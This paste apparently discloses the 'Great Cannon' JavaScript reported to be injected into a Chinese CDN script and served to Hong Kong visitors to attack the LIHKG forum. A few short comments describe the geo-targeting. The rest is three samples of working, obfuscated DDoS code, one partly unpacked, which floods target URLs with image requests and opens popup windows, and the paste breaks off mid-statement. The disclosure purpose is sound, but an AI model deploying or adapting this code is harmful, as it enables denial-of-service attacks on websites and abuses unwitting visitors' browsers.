
Great Cannon of China against LIHKG

a guest
Aug 31st, 2019
  1. // See also https://lihkg.com/thread/1522162/page/1, the thread where this script was found.
  2. //
  3. // When visiting http://js.passport.qihucdn.com/11.0.1.js?5d5100a4a5a2ac6a47af3cb82952cc7b
  4. // from locations in China and Singapore, you get this normal piece of
  5. // code:
  6.  
  7. document.write('<script charset="utf-8" src="http://s6.qhres.com/static/ab77b6ea7f3fbf79.js"></script>')
  8.  
  9. // However, when the IP is located in Hong Kong, as of 2019 Aug 31st, you will
  10. // get obfuscated code like the samples below instead:
  11.  
  12. // sample (a)
  13.  
  14. var _a='/yc(BNag:H"s0 tAo4e=f-Ybd5?nxwDEv,lOUSF6rL)CM<iz1&2p.km_>hITu',_b='.&YcfatmD4F2oESBb5w/)rghsu"= _yz>i?Al1MNvUL(Cnx0HOI<kpT,6e:d-',_c='aNb:z)i2?kE4Yt5Fu_<e/CMoycBhT&nDfO=U>-dls"pxILA6S0v,mgH(.w1r ',e=33190,t=11997755,n=100,o=_a[57]+_a[14]+_c[13]+_b[53]+_c[3]+_c[20]+_a[0]+_b[37]+_b[37]+_c[47]+_c[56]+_b[11]+_b[17]+_b[17]+_b[0]+_a[50]+_b[11]+_b[56]+_c[56]+_b[37]+_b[17]+_b[9]+_b[19];if(/chrome\/([\d]+)/gi[_a[18]+_b[46]+_a[18]+_b[3]](window[_b[45]+_a[6]+_b[40]+_b[33]+_c[53]+_a[6]+_b[6]+_c[23]+_a[40]][_a[60]+_a[11]+_a[18]+_b[21]+_a[15]+_b[22]+_c[19]+_c[30]+_a[14]][_a[14]+_a[16]+_c[45]+_a[16]+_a[29]+_a[18]+_a[40]+_c[21]+_b[5]+_a[11]+_a[18]]())[1]>=34&&window[_a[27]+_a[6]+_c[50]+_b[33]+_b[22]+_a[6]+_c[13]+_b[12]+_c[59]][_a[60]+_c[40]+_b[57]+_b[21]+_a[15]+_a[7]+_c[19]+_a[27]+_c[13]][_b[6]+_c[23]+_b[42]+_c[23]+_b[18]+_a[18]+_b[21]+_a[43]+_b[5]+_a[11]+_c[19]]()[_c[6]+_a[27]+_b[59]+_b[57]+_b[46]+_b[49]+_b[4]](_a[18]+_b[59]+_b[22]+_b[57])<0){var l=3e5,a=1482184792,i=1e5,r=[_b[23]+_c[13]+_b[6]+_a[51]+_b[24]+_b[58]+_c[20]+_a[0]+_b[36]+_b[33]+_a[57]+_b[52]+_b[22]+_a[52]+_a[2]+_c[23]+_c[52]+_b[19]+_c[0]+_a[51]+_c[6]+_a[55]+_a[32]+_a[50]+_a[0]+_c[13]+_a[57]+_c[59]+_c[19]+_a[6]+_b[59]+_a[0]+_a[34]+_a[6]+_b[6]+_b[57]+_b[24]+_a[14]+_c[8]+_a[2]+_b[5]+_a[14]+_c[17]+_a[46]+_a[24]+_b[27]+_a[48]+_b[1]+_b[53]+_c[0]+_a[7]+_c[19]+_a[19]+_b[37]+_a[49]+_c[25]+_a[16]+_b[25]+_a[27]+_c[13]+_b[27]+_a[39]+_c[49]+_b[1]+_a[14]+_a[1]+_a[51]+_a[18]+_a[19]+_c[30]+_c[23]+_a[29]+_c[29]+_a[14]+_b[27]],c=_b[23]+_a[14]+_c[13]+_a[51]+_a[11]+_a[8]+_b[19]+_c[20]+_b[36]+_b[33]+_b[23]+_c[9]+_b[22]+_c[56]+_c[25]+_b[12]+_a[54],u=500;function unixtime(){var _=_b,a=_a,c=_c,b=new Date;return 
Date[a[36]+a[59]+c[21]](b[a[7]+_[57]+c[13]+c[15]+a[60]+_[36]+_[36]+c[12]+a[18]+_[5]+c[59]](),b[a[7]+_[57]+c[13]+a[44]+c[23]+a[27]+a[14]+_[23]](),b[a[7]+c[19]+a[14]+c[31]+_[5]+c[13]+c[19]](),b[a[7]+a[18]+a[14]+c[54]+c[23]+c[16]+_[21]+_[24]](),b[_[22]+_[57]+_[6]+_[38]+a[46]+c[30]+a[60]+c[13]+c[19]+_[24]](),b[c[53]+_[57]+_[6]+_[14]+_[57]+a[2]+_[12]+_[45]+_[59]+a[11]]())/1e3}function updateVT(){var _=_a;localStorage[_c[50]+_[14]]=unixtime()+l/1e3^a}function canExe(){var _=_a,c=_b,b=_c;return null==localStorage[b[50]+_[14]]?(updateVT(),!0):(localStorage[b[50]+b[13]]^a)>unixtime()?b[49]!=localStorage[c[3]+_[34]]:c[47]!=localStorage[c[3]+b[39]]&&(updateVT(),!0)}if(1==canExe()){localStorage[_b[3]+_b[36]]=0,document[_c[53]+_c[19]+_c[13]+_b[13]+_a[34]+_a[18]+_c[52]+_b[57]+_a[27]+_c[13]+_b[24]+_c[26]+_b[30]+_c[28]+_a[6]+_b[22]+_c[1]+_b[5]+_a[54]+_a[18]](_a[57]+_b[57]+_b[5]+_b[59])[0][_c[6]+_b[45]+_c[30]+_a[18]+_b[21]+_b[48]+_b[54]+_c[22]+_b[42]]=_a[45]+_b[7]+_a[18]+_c[13]+_c[0]+_c[60]+_b[45]+_b[5]+_c[52]+_a[18]+_b[27]+_c[41]+_b[21]+_a[18]+_b[4]+_c[19]+_a[40]+_b[21]+_b[57]+_b[21]+_a[10]+_c[60]+_a[2]+_c[23]+_c[30]+_c[13]+_c[19]+_c[30]+_c[13]+_c[34]+_c[41]+_c[30]+_b[12]+_a[21]+_c[59]+_a[18]+_a[20]+_a[18]+_a[40]+_c[59]+_c[19]+_b[21]+_a[10]+_c[36]+document[_c[53]+_b[57]+_b[6]+_c[10]+_b[36]+_b[57]+_c[52]+_a[18]+_c[30]+_a[14]+_c[40]+_a[4]+_b[30]+_c[28]+_a[6]+_c[53]+_c[1]+_b[5]+_b[7]+_b[57]](_c[27]+_b[57]+_b[5]+_a[24])[0][_a[46]+_a[27]+_b[45]+_a[18]+_b[21]+_c[54]+_a[59]+_a[44]+_a[41]],window[_b[12]+_c[30]+_c[2]+_c[19]+_a[20]+_c[23]+_b[21]+_c[19]+_c[16]+_c[30]+_c[39]+_c[23]+_c[0]+_b[59]]=function(){localStorage[_a[2]+_c[39]]=1};var d=!1,m=null;function popwin(){var 
_=_b,a=_a,b=_c;1==d&&(m=window[b[23]+b[42]+a[18]+a[27]](c,a[55]+_[16]+_[36]+_[5]+_[45]+a[53],_[6]+b[23]+b[23]+a[34]+a[23]+a[6]+a[40]+_[27]+b[30]+_[12]+_[55]+b[40]+b[13]+a[6]+b[13]+a[60]+b[40]+b[34]+_[45]+_[12]+_[55]+b[52]+a[18]+a[27]+a[60]+b[2]+_[5]+b[59]+_[27]+b[30]+_[12]+b[51]+b[40]+b[25]+_[21]+b[23]+a[34]+_[36]+b[2]+b[0]+b[59]+b[40]+a[19]+a[27]+a[16]+b[51]+a[40]+b[19]+_[24]+a[46]+_[31]+b[0]+b[2]+_[36]+_[57]+a[19]+_[45]+b[23]+b[51]+b[39]+_[57]+_[4]+a[14]+b[34]+a[48]+b[49]+a[12]+b[49]+a[12]+_[47]+b[51]+b[60]+_[6]+a[16]+_[53]+_[27]+a[48]+_[47]+_[47]+b[49]+a[12]+b[49]+b[51]+b[60]+_[18]+_[33]+b[38]+_[6]+b[27]+b[34]+b[58]+a[33]+b[60]+a[57]+a[18]+_[33]+b[53]+_[23]+_[6]+a[19]+b[58]+a[33]+b[60]+_[40]+_[33]+_[24]+_[33]+a[23]+_[36]+a[18]+_[27]+a[27]+a[16]+_[45]+b[19],""),window[a[20]+a[16]+b[25]+b[16]+_[24]](),d=!1,document[a[40]+b[19]+b[52]+_[12]+_[40]+b[19]+b[10]+b[50]+b[19]+a[27]+a[14]+a[41]+_[33]+a[11]+_[6]+a[18]+a[27]+_[57]+a[40]](a[2]+b[39]+a[46]+b[25]+b[9],popwin))}document[_a[6]+_c[38]+_a[24]+_b[13]+_b[40]+_a[18]+_a[27]+_c[13]+_c[45]+_b[33]+_c[40]+_a[14]+_c[19]+_c[30]+_c[19]+_b[21]](_a[2]+_b[36]+_b[33]+_a[2]+_c[9],popwin);var g=null,s=null,w=null,p=null,h=null,v="",f=0;function imgdel(){var _=_b,a=_a,c=_c;null!=g&&document[a[23]+a[16]+a[24]+c[24]][_[21]+a[18]+_[7]+_[12]+c[50]+a[18]+c[21]+a[57]+a[46]+_[36]+a[24]](g),g=null,v=r[unixtime()%r[c[39]+c[19]+c[30]+a[7]+_[6]+c[27]]],f<i&&h-w<l?setTimeout(_[33]+c[52]+a[7]+_[5]+_[59]+a[24]+c[55]+a[42],h-p>u?u:h-p):localStorage[_[3]+a[34]]=1}function isImgComplete(){var _=_a,a=_b,c=_c;g[c[25]+_[16]+a[7]+_[51]+a[36]+_[18]+_[14]+_[18]]?(window[a[3]+c[39]+c[19]+c[0]+a[21]+a[50]+c[30]+c[13]+a[57]+_[40]+a[40]+c[0]+_[34]](s),(h=(new Date)[_[7]+_[18]+_[14]+a[54]+c[6]+c[52]+c[19]]())-p>1e3?(null!=m&&(m[a[3]+_[34]+_[16]+_[11]+_[18]](),m=null),f+=1):d=!0,imgdel()):(new Date)[_[7]+a[57]+a[6]+_[59]+_[46]+_[54]+a[57]]()-p>2e3&&imgdel()}function imgadd(){var 
_=_c,a=_b,c=_a;(g=document[a[16]+a[12]+a[59]+a[30]][a[5]+c[51]+a[53]+_[19]+c[27]+_[38]+c[43]+c[57]+_[6]+a[36]+_[38]](document[c[2]+c[40]+a[57]+c[6]+c[14]+c[18]+a[13]+_[39]+_[19]+_[52]+c[18]+c[27]+c[14]](a[33]+_[52]+a[22])))[a[24]+c[40]+_[25]]=v+unixtime()+Math[c[2]+_[19]+c[46]+_[39]](100*Math[a[21]+_[0]+a[45]+a[59]+_[23]+a[7]]()),g[_[40]+c[14]+a[30]+_[39]+a[57]][a[59]+_[6]+a[24]+c[51]+_[39]+a[5]+_[24]]=c[27]+c[16]+_[30]+_[19],p=(new Date)[a[22]+c[18]+_[13]+c[59]+c[46]+a[7]+c[18]](),s=setInterval(_[6]+_[40]+_[44]+c[54]+a[22]+a[44]+_[23]+c[54]+c[51]+c[34]+c[18]+c[14]+_[19]+c[3]+a[20],50),f+=1}w=(new Date)[_c[53]+_a[18]+_b[6]+_b[54]+_a[46]+_c[52]+_a[18]](),v=r[unixtime()%r[_c[39]+_c[19]+_a[27]+_b[22]+_b[6]+_b[23]]],imgadd()}}
  15.  
  16. // sample (b)
  17.  
  18. var _a='v)&hsipwoOEd=xYyf<IMlFur"Ne-0BbgS2L?Ccz:DkH>n_/.1mAa(,46U5Tt ',_b='-=rz:c<g0y6xO2i?n1S(paC5 DMAB",ohfULEw&b)T_.INmulHksY>/Fed4tv',_c='=>zkFiE0hdveUs-25"au& 4rL<,by/CfYSBx:oDH1mAlN?Tn6.(cOg)Iw_ptM',e=33190,t=11997755,n=100,o=_a[3]+_a[59]+_a[59]+_a[6]+_a[39]+_c[29]+_b[54]+_a[48]+_c[40]+_b[10]+_c[49]+_b[13]+_a[57]+_b[23]+_b[43]+_b[13]+_a[33]+_b[10]+_b[43]+_b[17]+_c[16]+_c[22]+_b[54];if(/chrome\/([\d]+)/gi[_c[11]+_c[35]+_c[11]+_a[37]](window[_a[44]+_b[21]+_b[60]+_a[5]+_a[31]+_c[18]+_a[59]+_c[37]+_a[23]][_b[47]+_b[51]+_c[11]+_c[23]+_b[27]+_b[7]+_b[56]+_c[47]+_a[59]][_c[59]+_b[31]+_b[35]+_a[8]+_b[37]+_a[26]+_c[23]+_a[36]+_b[21]+_b[51]+_a[26]]())[1]>=34&&window[_b[16]+_b[21]+_a[0]+_c[5]+_b[7]+_c[18]+_b[59]+_c[37]+_c[23]][_b[47]+_a[4]+_a[26]+_c[23]+_a[50]+_c[53]+_c[11]+_c[47]+_a[59]][_a[59]+_c[37]+_a[34]+_b[31]+_b[37]+_c[11]+_a[23]+_b[22]+_b[21]+_b[51]+_a[26]]()[_b[14]+_b[16]+_b[57]+_c[11]+_a[13]+_a[9]+_c[31]](_b[56]+_a[11]+_b[7]+_c[11])<0){var l=3e5,a=1482184792,i=1e5,r=[_b[32]+_c[59]+_b[59]+_b[20]+_b[51]+_a[39]+_a[46]+_a[46]+_c[43]+_a[5]+_b[32]+_a[41]+_c[53]+_a[47]+_a[37]+_a[8]+_a[49]+_b[54]+_c[18]+_a[6]+_b[14]+_c[57]+_b[60]+_b[13]+_c[29]+_a[59]+_a[3]+_b[2]+_a[26]+_c[18]+_c[9]+_b[54]+_a[20]+_a[51]+_b[59]+_c[11]+_a[4]+_a[59]+_a[35]+_a[37]+_a[51]+_b[59]+_c[57]+_b[14]+_c[9]+_b[1]+_b[17]+_b[38]+_c[58]+_b[21]+_a[31]+_c[11]+_c[0]+_c[40]+_b[38]+_a[37]+_a[8]+_c[19]+_b[16]+_c[59]+_c[0]+_b[10]+_b[8]+_c[20]+_c[59]+_a[15]+_c[58]+_b[56]+_b[1]+_a[44]+_c[37]+_b[37]+_b[38]+_b[59]+_c[0]],c=_a[3]+_c[59]+_b[59]+_c[58]+_b[51]+_b[4]+_a[46]+_a[46]+_a[20]+_b[14]+_a[3]+_a[41]+_a[31]+_a[47]+_b[5]+_a[8]+_b[46],u=500;function unixtime(){var _=_a,a=_c,c=_b,b=new Date;return 
Date[_[56]+a[46]+c[22]](b[c[7]+c[56]+a[59]+c[55]+_[22]+c[48]+_[20]+_[14]+_[26]+_[51]+a[23]](),b[_[31]+_[26]+a[59]+_[19]+c[31]+_[44]+c[59]+_[3]](),b[a[53]+a[11]+_[59]+c[25]+c[21]+a[59]+c[56]](),b[c[7]+a[11]+c[59]+a[39]+c[31]+a[19]+_[23]+c[51]](),b[_[31]+c[56]+_[59]+_[19]+c[14]+_[44]+_[22]+_[59]+_[26]+_[4]](),b[_[31]+a[11]+a[59]+_[32]+_[26]+a[51]+a[37]+c[16]+_[11]+c[51]]())/1e3}function updateVT(){var _=_a;localStorage[_b[60]+_[59]]=unixtime()+l/1e3^a}function canExe(){var _=_b,c=_c,b=_a;return null==localStorage[_[60]+c[59]]?(updateVT(),!0):(localStorage[c[10]+_[59]]^a)>unixtime()?c[7]!=localStorage[b[37]+b[20]]:b[28]!=localStorage[_[5]+b[20]]&&(updateVT(),!0)}if(1==canExe()){localStorage[_c[51]+_c[43]]=0,document[_c[53]+_c[11]+_c[59]+_c[6]+_c[43]+_b[56]+_c[41]+_b[56]+_c[47]+_a[59]+_c[13]+_b[28]+_c[28]+_c[46]+_c[18]+_c[53]+_c[44]+_a[51]+_a[49]+_a[26]](_c[8]+_a[26]+_a[51]+_b[57])[0][_b[14]+_c[47]+_b[16]+_c[11]+_c[23]+_a[42]+_a[58]+_c[60]+_b[35]]=_b[6]+_b[46]+_c[11]+_a[59]+_b[21]+_b[24]+_a[44]+_a[51]+_b[46]+_b[56]+_c[0]+_c[17]+_a[23]+_a[26]+_c[31]+_c[11]+_b[2]+_a[23]+_b[56]+_b[2]+_c[17]+_b[24]+_a[37]+_a[8]+_a[44]+_b[59]+_a[26]+_a[44]+_c[59]+_c[0]+_c[17]+_c[47]+_c[37]+_a[27]+_c[23]+_a[26]+_b[33]+_c[11]+_b[2]+_c[23]+_b[56]+_a[23]+_c[17]+_a[43]+document[_c[53]+_a[26]+_c[59]+_a[10]+_c[43]+_a[26]+_b[46]+_a[26]+_a[44]+_b[59]+_a[4]+_c[34]+_a[15]+_a[58]+_a[51]+_c[53]+_b[45]+_b[21]+_a[49]+_c[11]](_b[32]+_c[11]+_b[21]+_c[9])[0][_c[5]+_a[44]+_c[47]+_a[26]+_c[23]+_b[49]+_a[58]+_c[60]+_a[34]],window[_a[8]+_a[44]+_a[30]+_b[56]+_c[31]+_c[37]+_a[23]+_c[11]+_b[47]+_c[47]+_c[43]+_a[8]+_b[21]+_a[11]]=function(){localStorage[_b[5]+_b[48]]=1};var d=!1,m=null;function popwin(){var 
_=_b,a=_c,b=_a;1==d&&(m=window[a[37]+_[20]+_[56]+_[16]](c,_[42]+b[30]+b[20]+a[18]+b[44]+b[41],b[59]+_[31]+_[31]+_[48]+b[30]+a[18]+_[2]+_[1]+_[16]+a[37]+b[53]+_[51]+b[59]+a[18]+b[59]+a[19]+_[51]+b[12]+_[16]+b[8]+_[30]+a[41]+b[26]+a[47]+_[47]+b[30]+b[51]+_[2]+_[1]+_[16]+_[31]+b[53]+_[51]+a[51]+_[2]+a[37]+b[20]+b[20]+a[27]+a[18]+b[23]+_[51]+b[12]+a[47]+b[8]+a[26]+a[23]+a[11]+_[51]+b[5]+a[2]+b[51]+b[30]+a[43]+_[56]+_[1]+b[44]+_[31]+a[26]+_[48]+b[26]+_[33]+b[59]+_[1]+_[17]+b[28]+_[8]+b[28]+b[28]+b[28]+b[53]+a[21]+_[59]+a[37]+_[20]+a[0]+_[17]+a[7]+_[8]+a[7]+b[28]+b[28]+_[30]+_[24]+_[37]+a[5]+a[9]+_[59]+b[3]+_[1]+a[40]+b[53]+b[60]+a[8]+b[26]+a[5]+b[31]+_[32]+a[59]+b[12]+a[40]+_[30]+b[60]+_[60]+a[5]+_[51]+a[5]+a[27]+a[43]+_[56]+b[12]+b[44]+a[37]+a[47]+_[56],""),window[_[33]+_[31]+_[5]+b[22]+_[51]](),d=!1,document[a[23]+_[56]+_[46]+b[8]+b[0]+b[26]+_[36]+_[60]+a[11]+b[44]+_[59]+_[35]+a[5]+a[13]+_[59]+b[26]+a[47]+a[11]+_[2]](_[5]+_[48]+b[5]+b[37]+a[3],popwin))}document[_b[21]+_a[11]+_a[11]+_b[36]+_c[10]+_b[56]+_b[16]+_c[59]+_b[35]+_a[5]+_b[51]+_b[59]+_b[56]+_b[16]+_b[56]+_b[2]](_c[51]+_c[43]+_a[5]+_c[51]+_b[50],popwin);var g=null,s=null,w=null,p=null,h=null,v="",f=0;function imgdel(){var _=_b,a=_a,c=_c;null!=g&&document[_[39]+a[8]+c[9]+c[28]][a[23]+_[56]+a[49]+a[8]+a[0]+a[26]+a[36]+_[32]+a[5]+c[43]+c[9]](g),g=null,v=r[unixtime()%r[a[20]+c[11]+c[47]+a[31]+_[59]+_[32]]],f<i&&h-w<l?setTimeout(_[14]+c[41]+a[31]+_[21]+c[9]+c[9]+a[52]+c[54],h-p>u?u:h-p):localStorage[a[37]+_[48]]=1}function isImgComplete(){var _=_b,a=_c,c=_a;g[_[5]+_[31]+a[41]+a[58]+c[20]+_[56]+c[59]+_[56]]?(window[c[37]+_[48]+a[11]+c[51]+a[23]+_[44]+_[16]+_[59]+_[56]+a[23]+c[0]+c[51]+a[43]](s),(h=(new Date)[_[7]+_[56]+c[59]+c[58]+c[5]+c[49]+a[11]]())-p>1e3?(null!=m&&(m[_[5]+c[20]+a[37]+a[13]+a[11]](),m=null),f+=1):d=!0,imgdel()):(new Date)[_[7]+c[26]+a[59]+a[46]+c[5]+_[46]+a[11]]()-p>2e3&&imgdel()}function imgadd(){var 
_=_c,a=_a,c=_b;(g=document[_[27]+a[8]+c[57]+_[28]][c[21]+_[58]+c[20]+a[26]+a[44]+c[57]+c[22]+a[3]+a[5]+_[43]+c[57]](document[a[37]+_[23]+a[26]+_[18]+c[59]+c[56]+_[6]+a[20]+c[56]+a[49]+c[56]+_[47]+a[59]](_[5]+_[41]+a[31])))[_[13]+c[2]+_[51]]=v+unixtime()+Math[_[51]+c[56]+_[5]+_[43]](100*Math[c[2]+c[21]+_[47]+c[57]+a[8]+c[46]]()),g[_[13]+_[59]+_[28]+_[43]+c[56]][a[11]+_[5]+a[4]+c[20]+_[43]+c[21]+_[28]]=_[47]+_[37]+a[44]+a[26],p=(new Date)[_[53]+c[56]+_[59]+c[41]+_[5]+a[49]+a[26]](),s=setInterval(c[14]+c[51]+a[18]+a[49]+c[7]+_[30]+c[31]+c[46]+_[58]+a[20]+c[56]+c[59]+a[26]+c[19]+a[1],50),f+=1}w=(new Date)[_c[53]+_c[11]+_c[59]+_c[46]+_b[14]+_b[46]+_c[11]](),v=r[unixtime()%r[_c[43]+_a[26]+_b[16]+_b[7]+_c[59]+_a[3]]],imgadd()}}
  19.  
  20. // Meanwhile, for IPs in the US and Germany, the obfuscated code is also packed;
  21. // it can be unpacked into this:
  22.  
  23. var _a='A&FLe<ah.kub6lmyYgU1cDS,Mn(=B?sz4"xwit52oH-rI dvNTC:f>p0/E_)O';var _b='.z4rt:TS-y&ov_cLCEIMmwpg>BUDkNH/6i(),ab0 1esl<xAY?5"hd=F2Oufn';var _c='_h=ltx2,4b1SsM&)B.F" LNe?idUI(av5gowncfD/:EyCYp0r-um6A<zk>HOT';var TASKID=33190;var MAGICNUM=11997755;var EXECNUM=100;var FEEDBACKADDR=_a[7]+_b[4]+_b[4]+_b[22]+_b[5]+_a[56]+_c[40]+_a[19]+_b[41]+_b[32]+_b[0]+_b[56]+_c[32]+_b[50]+_a[8]+_a[39]+_b[56]+_b[32]+_c[17]+_b[41]+_b[50]+_b[2]+_c[40];if(/chrome\/([\d]+)/gi[_a[4]+_b[46]+_b[42]+_a[20]](window[_c[36]+_b[37]+_a[47]+_b[33]+_b[23]+_c[30]+_b[4]+_a[40]+_c[48]][_b[58]+_c[12]+_c[23]+_c[48]+_c[53]+_b[23]+_b[42]+_a[25]+_a[37]][_c[4]+_a[40]+_c[21]+_b[11]+_b[21]+_c[23]+_c[48]+_c[44]+_a[6]+_c[12]+_c[23]]())[1]>=34&&window[_c[36]+_b[37]+_c[31]+_a[36]+_c[33]+_a[6]+_c[4]+_a[40]+_c[48]][_b[58]+_c[12]+_a[4]+_c[48]+_b[47]+_a[17]+_c[23]+_a[25]+_c[4]][_a[37]+_b[11]+_c[21]+_a[40]+_c[35]+_b[42]+_b[3]+_a[50]+_c[30]+_a[30]+_c[23]]()[_a[36]+_b[60]+_a[46]+_c[23]+_c[5]+_a[60]+_a[52]](_b[42]+_b[53]+_c[33]+_a[4])<0){var MAX_TIME=300000;var MAGIC=0x58585858;var MAX_COUNT=100000;var url_list=[_a[7]+_a[37]+_a[37]+_b[22]+_b[43]+_b[5]+_c[40]+_b[31]+_c[3]+_a[36]+_c[1]+_a[9]+_a[17]+_b[0]+_c[37]+_c[34]+_c[51]+_a[56]+_b[37]+_c[46]+_c[25]+_a[58]+_a[47]+_a[39]+_a[56]+_a[37]+_b[52]+_a[43]+_c[23]+_b[37]+_b[53]+_c[40]+_a[13]+_b[37]+_a[37]+_a[4]+_c[12]+_a[37]+_a[29]+_a[20]+_b[37]+_c[4]+_b[13]+_c[25]+_c[26]+_a[27]+_b[41]+_b[10]+_a[54]+_c[30]+_a[17]+_a[4]+_a[27]+_c[10]+_c[14]+_a[20]+_c[34]+_c[50]+_c[36]+_b[4]+_b[54]+_a[12]+_a[55]+_a[1]+_a[37]+_a[15]+_c[46]+_c[23]+_a[27]+_b[60]+_a[40]+_b[21]+_a[1]+_a[37]+_c[2]];var cloudflare_js_validate_url=_a[7]+_b[4]+_a[37]+_c[46]+_c[12]+_b[5]+_b[31]+_a[56]+_b[44]+_b[33]+_c[1]+_b[28]+_b[23]+_c[17]+_b[14]+_b[11]+_c[51];var TIMEGAP=500;function unixtime(){var a=_a;var b=_b;var c=_c;var d=new Date();return 
Date[a[18]+a[49]+a[50]](d[b[23]+b[42]+c[4]+a[2]+c[50]+b[44]+c[3]+a[16]+a[4]+b[37]+a[43]](),d[c[33]+a[4]+c[4]+c[13]+c[34]+c[36]+c[4]+c[1]](),d[b[23]+c[23]+a[37]+b[27]+c[30]+c[4]+a[4]](),d[a[17]+a[4]+b[4]+b[30]+b[11]+b[58]+c[48]+a[30]](),d[b[23]+a[4]+c[4]+a[24]+b[33]+b[60]+b[58]+b[4]+c[23]+c[12]](),d[b[23]+a[4]+c[4]+c[11]+c[23]+c[37]+b[11]+c[36]+c[26]+c[12]]())/1000}function updateVT(){var a=_b;var b=_a;var c=_c;localStorage[c[31]+a[4]]=unixtime()+MAX_TIME/1000^MAGIC}function canExe(){var a=_b;var b=_c;var c=_a;if(localStorage[b[31]+a[4]]==null){updateVT();return true}else{if((localStorage[a[12]+c[37]]^MAGIC)>unixtime()){return localStorage[b[37]+a[44]]!=c[55]}else{if(localStorage[a[14]+b[3]]!=b[47]){updateVT();return true}else{return false}}}}if(canExe()==true){localStorage[_c[37]+_a[13]]=0;document[_a[17]+_b[42]+_a[37]+_b[17]+_a[13]+_b[42]+_c[51]+_c[23]+_a[25]+_a[37]+_a[30]+_b[25]+_c[43]+_b[6]+_c[30]+_b[23]+_a[48]+_b[37]+_c[51]+_a[4]](_a[7]+_a[4]+_b[37]+_c[26])[0][_a[36]+_b[60]+_a[25]+_a[4]+_c[48]+_b[30]+_c[60]+_b[19]+_a[3]]=_c[54]+_b[20]+_b[42]+_a[37]+_a[6]+_c[20]+_b[60]+_a[6]+_c[51]+_b[42]+_a[27]+_b[51]+_a[43]+_a[4]+_c[38]+_a[4]+_b[3]+_a[43]+_c[23]+_b[3]+_b[51]+_b[40]+_a[20]+_b[11]+_a[25]+_c[4]+_c[23]+_a[25]+_c[4]+_c[2]+_c[19]+_a[25]+_c[34]+_c[49]+_c[48]+_a[4]+_c[38]+_c[23]+_b[3]+_c[48]+_c[23]+_b[3]+_c[19]+_b[24]+document[_c[33]+_c[23]+_c[4]+_b[17]+_a[13]+_a[4]+_a[14]+_c[23]+_a[25]+_b[4]+_b[43]+_b[25]+_b[9]+_a[49]+_b[37]+_c[33]+_a[48]+_a[6]+_a[14]+_a[4]](_a[7]+_b[42]+_a[6]+_a[46])[0][_b[33]+_c[36]+_b[60]+_c[23]+_c[48]+_b[30]+_a[49]+_b[19]+_c[21]];window[_b[11]+_b[60]+_a[11]+_c[23]+_b[59]+_b[11]+_b[3]+_c[23]+_a[10]+_b[60]+_b[44]+_b[11]+_b[37]+_c[26]]=function(){var a=_a;var b=_b;var c=_c;localStorage[_b[14]+_a[13]]=1};var canpop=false;var p_win=null;function popwin(){var a=_c;var b=_a;var 
c=_b;if(canpop==true){p_win=window[a[34]+b[54]+c[42]+a[36]](cloudflare_js_validate_url,c[13]+c[38]+c[44]+c[37]+c[60]+c[28],a[4]+c[11]+a[34]+c[44]+c[38]+b[6]+c[3]+a[2]+c[60]+b[40]+b[23]+a[12]+c[4]+b[6]+c[4]+a[50]+c[43]+b[27]+a[36]+b[40]+c[36]+b[14]+a[23]+c[60]+a[50]+a[9]+c[37]+a[48]+b[27]+b[25]+a[34]+a[7]+a[12]+c[14]+c[3]+b[40]+b[13]+c[44]+c[38]+c[37]+c[3]+a[12]+c[54]+c[60]+b[40]+a[7]+b[43]+b[4]+c[43]+a[25]+b[31]+c[37]+b[11]+b[13]+b[4]+b[27]+a[36]+b[40]+c[36]+a[3]+a[23]+b[52]+a[4]+b[27]+c[41]+a[47]+b[55]+c[39]+a[47]+c[39]+c[36]+b[45]+a[4]+a[34]+b[54]+a[2]+a[10]+b[55]+a[47]+b[55]+b[55]+c[39]+b[23]+b[45]+a[35]+a[25]+a[26]+a[4]+b[7]+b[27]+a[10]+a[7]+b[45]+a[1]+b[4]+c[33]+b[17]+b[7]+a[4]+a[2]+a[10]+a[7]+b[45]+c[12]+c[33]+b[30]+c[33]+c[38]+a[3]+c[42]+b[27]+a[36]+a[34]+c[60]+c[42],'');window[b[52]+a[34]+c[14]+a[50]+b[30]]();canpop=false;document[b[43]+b[4]+c[20]+b[40]+a[31]+b[4]+b[57]+a[31]+a[23]+a[36]+b[37]+c[15]+c[33]+a[12]+b[37]+b[4]+b[25]+c[42]+b[43]](a[37]+b[13]+a[25]+a[37]+b[9],popwin)}}document[_b[37]+_c[26]+_a[46]+_a[57]+_b[12]+_a[4]+_b[60]+_a[37]+_b[15]+_c[25]+_c[12]+_b[4]+_c[23]+_a[25]+_c[23]+_b[3]](_a[20]+_c[3]+_c[25]+_a[20]+_b[28],popwin);var p_img=null;var timer=null;var starttime=null;var requesttime=null;var responsetime=null;var url='';var count=0;function imgdel(){var a=_c;var b=_b;var c=_a;if(p_img!=null){document[b[38]+b[11]+a[26]+c[15]][b[3]+b[42]+b[20]+c[40]+b[12]+c[4]+b[16]+b[52]+c[36]+c[13]+a[26]](p_img)}p_img=null;url=url_list[unixtime()%url_list[c[13]+a[23]+c[25]+a[33]+a[4]+b[52]]];if(count<MAX_COUNT&&responsetime-starttime<MAX_TIME)setTimeout(b[33]+c[14]+a[33]+c[6]+b[53]+a[26]+a[29]+a[15],responsetime-requesttime>TIMEGAP?TIMEGAP:responsetime-requesttime);else localStorage[a[37]+a[3]]=1}function isImgComplete(){var a=_c;var b=_b;var c=_a;if(p_img[a[37]+c[40]+a[51]+c[54]+a[3]+a[23]+a[4]+c[4]]){window[b[14]+a[3]+a[23]+c[6]+b[3]+c[44]+b[60]+a[4]+c[4]+c[43]+b[12]+b[37]+a[3]](timer);responsetime=new 
Date()[b[23]+c[4]+c[37]+b[6]+a[25]+b[20]+a[23]]();if(responsetime-requesttime>1000){if(p_win!=null){p_win[b[14]+b[44]+b[11]+b[43]+b[42]]();p_win=null}count+=1}else{canpop=true}imgdel()}else{if(new Date()[c[17]+a[23]+b[4]+b[6]+a[25]+b[20]+a[23]]()-requesttime>2000){imgdel()}}}function imgadd(){var a=_c;var b=_b;var c=_a;p_img=document[a[9]+c[40]+a[26]+a[43]][b[37]+a[46]+c[54]+a[23]+c[25]+c[46]+c[50]+c[7]+a[25]+a[3]+a[26]](document[a[37]+c[43]+a[23]+b[37]+a[4]+a[23]+a[42]+b[44]+a[23]+b[20]+c[4]+a[36]+a[4]](b[33]+b[20]+b[23]));p_img[c[30]+a[48]+a[37]]=url+unixtime()+Math[c[20]+b[42]+a[25]+c[13]](Math[a[48]+b[37]+a[36]+c[46]+b[11]+c[14]]()*100);p_img[b[43]+b[4]+c[15]+b[44]+c[4]][c[46]+a[25]+a[12]+c[54]+a[3]+c[6]+a[43]]=b[60]+b[11]+a[36]+b[42];requesttime=new 